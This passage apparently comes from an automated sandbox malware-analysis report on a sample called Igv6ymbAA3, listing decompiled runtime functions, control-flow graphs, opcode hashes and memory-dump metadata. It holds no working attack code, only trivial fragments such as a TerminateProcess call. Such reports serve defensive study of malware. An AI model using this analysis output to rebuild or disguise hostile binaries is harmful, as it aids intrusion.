                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1292 40ea0a-40ea16 call 40e8de 1294 40ea1b-40ea1f 1292->1294
                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                      			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                                                                                                                                      0x0040ea0f
                                                                                                                                                                      0x0040ea11
                                                                                                                                                                      0x0040ea13
                                                                                                                                                                      0x0040ea16
                                                                                                                                                                      0x0040ea1f

                                                                                                                                                                      APIs
                                                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02410920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1295 2410920-2410929 TerminateProcess
                                                                                                                                                                      APIs
                                                                                                                                                                      • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02410929
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                                      • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                      • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                                                                                                      • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02560481 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1296 2560481-25604d9 1301 25604e5-25604e8 1296->1301 1302 25604db-25604dd 1296->1302 1303 25607f3-2560801 1301->1303 1304 25604ee-25604f0 1301->1304 1302->1303 1305 25604e3 1302->1305 1306 25604fa-256053c 1304->1306 1305->1304 1313 25605ae-2560618 1306->1313 1314 256053e-2560570 1306->1314 1333 2560631 1313->1333 1334 256061a-256062f 1313->1334 1323 2560572-2560574 1314->1323 1324 256057c-256057f 1314->1324 1323->1303 1325 256057a 1323->1325 1324->1303 1326 2560585-25605a8 1324->1326 1325->1326 1326->1313 1336 2560639 1333->1336 1338 2560644-256065a 1334->1338 1336->1338 1340 2560660-2560674 1338->1340 1341 25606fd-256070f 1338->1341 1344 2560676-256067e 1340->1344 1345 25606ec-25606f0 1340->1345 1346 2560715-2560719 1341->1346 1348 2560684-256068c 1344->1348 1345->1340 1347 25606f6 1345->1347 1349 2560790-25607c1 1346->1349 1350 256071b 1346->1350 1347->1341 1348->1341 1351 256068e-25606b4 1348->1351 1364 25607eb-25607f2 1349->1364 1352 2560720-2560726 1350->1352 1366 25606b6-25606e2 1351->1366 1367 25606e4-25606e8 1351->1367 1355 2560750-2560774 1352->1355 1356 2560728-256074e 1352->1356 1368 256077b-2560788 1355->1368 1356->1355 1366->1341 1367->1351 1369 25606ea 1367->1369 1371 256078e 1368->1371 1369->1341 1371->1364
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: *p^
                                                                                                                                                                      • API String ID: 0-1375670925
                                                                                                                                                                      • Opcode ID: e008e230be81df192422e2f4cfa5fc125b108d5b83eea75a105ca3929807f9c2
                                                                                                                                                                      • Instruction ID: fdc10476976fd6d88abbae20049272228484a5dd4504da8be7b5493be47c6e18
                                                                                                                                                                      • Opcode Fuzzy Hash: e008e230be81df192422e2f4cfa5fc125b108d5b83eea75a105ca3929807f9c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0EA1F5397505108FC754DF29D598E2ABBE2FF88B14B2580A9E50ACB3B5DB31EC05CB80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256F90A Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 8q
                                                                                                                                                                      • API String ID: 0-596622023
                                                                                                                                                                      • Opcode ID: b29a5e012cde8cff07a97f09f0fa4c253697d32b46eea324cbf72f923aa0d8b1
                                                                                                                                                                      • Instruction ID: c99c23d4a7a281a6ea6c29496cd86f78eb2e86b10b00fd404203b453879a0c19
                                                                                                                                                                      • Opcode Fuzzy Hash: b29a5e012cde8cff07a97f09f0fa4c253697d32b46eea324cbf72f923aa0d8b1
                                                                                                                                                                      • Instruction Fuzzy Hash: 97913E74A10209DFCB14DF68E998A6DBBB2FF88310B158559E816AB761DB30FC45CF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02563ACB Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 8cnj
                                                                                                                                                                      • API String ID: 0-139703364
                                                                                                                                                                      • Opcode ID: 2a80c58350979ee8976c26dd3bd4ad395cb79ae507c853bfc70ed7b81bad12e2
                                                                                                                                                                      • Instruction ID: b7a2887182aadb9b69f9ad174d25b914b8c797b41aa0efaaa872824120799610
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a80c58350979ee8976c26dd3bd4ad395cb79ae507c853bfc70ed7b81bad12e2
                                                                                                                                                                      • Instruction Fuzzy Hash: B3611730D11608DFCB04EFB8E8588ADBBB2FF8A316B20956DE415B7294DF359849CB15
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02563AD0 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 8cnj
                                                                                                                                                                      • API String ID: 0-139703364
                                                                                                                                                                      • Opcode ID: 18bfef62a566ec99e832d3e8a970258be9734a3f457124c68d4305708f855750
                                                                                                                                                                      • Instruction ID: e8ab2bd997c119c2d07145f535fd8320212178914cefc8d298eacc0a3dfe3b82
                                                                                                                                                                      • Opcode Fuzzy Hash: 18bfef62a566ec99e832d3e8a970258be9734a3f457124c68d4305708f855750
                                                                                                                                                                      • Instruction Fuzzy Hash: B9611730D01208DFCB04EFB8E8488ADBBB2FF8A316B60956DE415B7294DF359849CB15
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02565838 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 8cnj
                                                                                                                                                                      • API String ID: 0-139703364
                                                                                                                                                                      • Opcode ID: 75397e195887ef14989b1f3d8585132895b419a2a3d342da58f2d91abd995dbd
                                                                                                                                                                      • Instruction ID: 677037405e9d78924406d03e46155bda475ffadbf4f4059741982705cb6a852c
                                                                                                                                                                      • Opcode Fuzzy Hash: 75397e195887ef14989b1f3d8585132895b419a2a3d342da58f2d91abd995dbd
                                                                                                                                                                      • Instruction Fuzzy Hash: FD0108752047408BD325AF68D80963E7BE3EFC2315B108A2DC15A47695DF74A8098B91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02561A00 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c46c28abfce19efc4aec16125c932ef6cc114197e17d2b8b22a714e7223981d7
                                                                                                                                                                      • Instruction ID: e13cf088cb0e9658a57c8c6d853d3d5c8bb6209c46d1b8f7552411650f013463
                                                                                                                                                                      • Opcode Fuzzy Hash: c46c28abfce19efc4aec16125c932ef6cc114197e17d2b8b22a714e7223981d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD1E2B4D012298FDB64DF65C858BEEBBB2FB49300F1085EAD409A7350DB749A89CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02567D90 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9a1d658178016af71503dd406408732adbd0c2298db417dab232ff56713a4061
                                                                                                                                                                      • Instruction ID: 8a6eefefebc6d8ea33dcf8f701816158750fa0132ff81b2f2a2c4b98ff1af1eb
                                                                                                                                                                      • Opcode Fuzzy Hash: 9a1d658178016af71503dd406408732adbd0c2298db417dab232ff56713a4061
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D61B175A002049FCB049F78C41856EBFB2FF99714B14846AE84ADB395DF31AD0ACB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256EBA8 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 103e8c82daff25249559327f7e24faa0e7cdf831a6313da5f2db21f09f32851b
                                                                                                                                                                      • Instruction ID: 1226dfee23ade11e8fc8d60c147ce02569ef87ec32a47741465961939bb4821d
                                                                                                                                                                      • Opcode Fuzzy Hash: 103e8c82daff25249559327f7e24faa0e7cdf831a6313da5f2db21f09f32851b
                                                                                                                                                                      • Instruction Fuzzy Hash: BA51FE39A11219DFDB15DFA4E899DADBFB6FF88310F148419E802A7390DB31A941CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256C116 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 93267d843a81f6733d6b6298b56697eac47912fc000e878f83bb9459aa549207
                                                                                                                                                                      • Instruction ID: a34a4c34e80e04fd5934e4423f43a7cb45d5f880683feb7061af60ffce8ceafe
                                                                                                                                                                      • Opcode Fuzzy Hash: 93267d843a81f6733d6b6298b56697eac47912fc000e878f83bb9459aa549207
                                                                                                                                                                      • Instruction Fuzzy Hash: 43518E74B0020A5BEB04AB69989077E7BB3BBC8B00F64855DD116AF3C8DF75AC054BE1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256C118 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4a79b07e90a8f0a98e9770795f05d4d61ec887246f900f15b8c363d72dd8614c
                                                                                                                                                                      • Instruction ID: 581f9cd4a716a67e1a7b2009addf301431a561d9d01f014f1f37fba2859455ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a79b07e90a8f0a98e9770795f05d4d61ec887246f900f15b8c363d72dd8614c
                                                                                                                                                                      • Instruction Fuzzy Hash: 56517E74B0020A5BEB04AB69989077E7BB3BBC8B00F64855DD116AF3C8CF75AC454BE5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 025634B1 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3c9ba8d56c4961c872676edc1c3da7dfe5329a0891727dc1ecec49a543c531fe
                                                                                                                                                                      • Instruction ID: 17a4d0e992a1caf6d00d399049fc4779063d4961a8ed61f7d1be67e7adb29bb9
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c9ba8d56c4961c872676edc1c3da7dfe5329a0891727dc1ecec49a543c531fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 9251C474E00208DFDB58DFA6D8849ADBBB2FF89701F20852ED809A7358DB355846CF44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256FCD9 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a06e8e7f8aa93d58769a1ea0cefb65f62d979c05d22a3d5fc452ec791bcdad5b
                                                                                                                                                                      • Instruction ID: 66d5f5ffd5198fc43dd5f06e0b84c33826c56f9fdd19f811e01699f327a9ce2f
                                                                                                                                                                      • Opcode Fuzzy Hash: a06e8e7f8aa93d58769a1ea0cefb65f62d979c05d22a3d5fc452ec791bcdad5b
                                                                                                                                                                      • Instruction Fuzzy Hash: BC51E534A10209DFDB14DFA4E998AADBBB2FF88310F158458E816AB761DB31EC41CF50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 025663B8 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b4ee456e21869c43a0c485db812121b7514cadd50ae3dde494de6d0230b20c87
                                                                                                                                                                      • Instruction ID: c60d1fee1a19ab31138a55a1a766ad584caafc230d79527ae10da35aeb76f8e3
                                                                                                                                                                      • Opcode Fuzzy Hash: b4ee456e21869c43a0c485db812121b7514cadd50ae3dde494de6d0230b20c87
                                                                                                                                                                      • Instruction Fuzzy Hash: 94412978D10249DFCB18EFA8E9995ADBFB2FF88300B109859F511A7264DF306949CF61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 025663C8 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a3205273ddd81e6400b1ccf7bfb307ea2332d45a0f92114a4771c59848f735fc
                                                                                                                                                                      • Instruction ID: b830a2ca33ddb4c8c7baa82e6ee3afb89bf55d29c2a1cae0c8a6abbb8ad2ee89
                                                                                                                                                                      • Opcode Fuzzy Hash: a3205273ddd81e6400b1ccf7bfb307ea2332d45a0f92114a4771c59848f735fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 93411878D002499FCB18FFA8E8995ADBFB6FF88300B109819F511A7264DF306949CF61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256BEBB Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a1a8814eef89922c1ef21878772b62f9c065bd8e193f96dce2b81135eb4b20e6
                                                                                                                                                                      • Instruction ID: 3cf49b55a030c453e477c43ac4966f5e326791d0be657d5cb05e45d634d74948
                                                                                                                                                                      • Opcode Fuzzy Hash: a1a8814eef89922c1ef21878772b62f9c065bd8e193f96dce2b81135eb4b20e6
                                                                                                                                                                      • Instruction Fuzzy Hash: E931BF30B002849FDB14EB79D8587BE7FB2AF85704F0084AAE441EB296DF74990ACB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 025696B8 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5b64896841fc7bedb717a62c1d745a6d947f4c1a301746103ea0f4baeb22c62b
                                                                                                                                                                      • Instruction ID: c4039676b5b844104160c9eef321c754a12bc3dab08f3424f4441083e74c9fc3
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b64896841fc7bedb717a62c1d745a6d947f4c1a301746103ea0f4baeb22c62b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A3138387002048FDB18DF69C499A6A7BE2AB89700F14446DE906AB3A0DF36AC41CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02569801 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 07e1d48f3c3a3251e084fedbf6be873638961c2d07123176798bc7e996f3f890
                                                                                                                                                                      • Instruction ID: 270d5dab9db03a258c98b2009c91c098c372dec6fbb9af4fd3ea0eb82e79a4f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 07e1d48f3c3a3251e084fedbf6be873638961c2d07123176798bc7e996f3f890
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31D4347053858FC715AB39982912E3FE7AFC531131449BEE44ACB696DE749C0A8792
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0256C633 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2560000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bca40e6fc67f4ed70ee266aff7ef06e265196d3b28627063353b980f920ddf69
                                                                                                                                                                      • Instruction ID: ac5d1d74f5720f936599ccef32bc936efcef072942592406800394fe0d506481
                                                                                                                                                                      • Opcode Fuzzy Hash: bca40e6fc67f4ed70ee266aff7ef06e265196d3b28627063353b980f920ddf69
                                                                                                                                                                      • Instruction Fuzzy Hash: 10419C31D10706CBDB20AFA8D8542D9F771FFA9320F249A1AE445BB644EB30B5D4CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 025665A1 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401830152.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
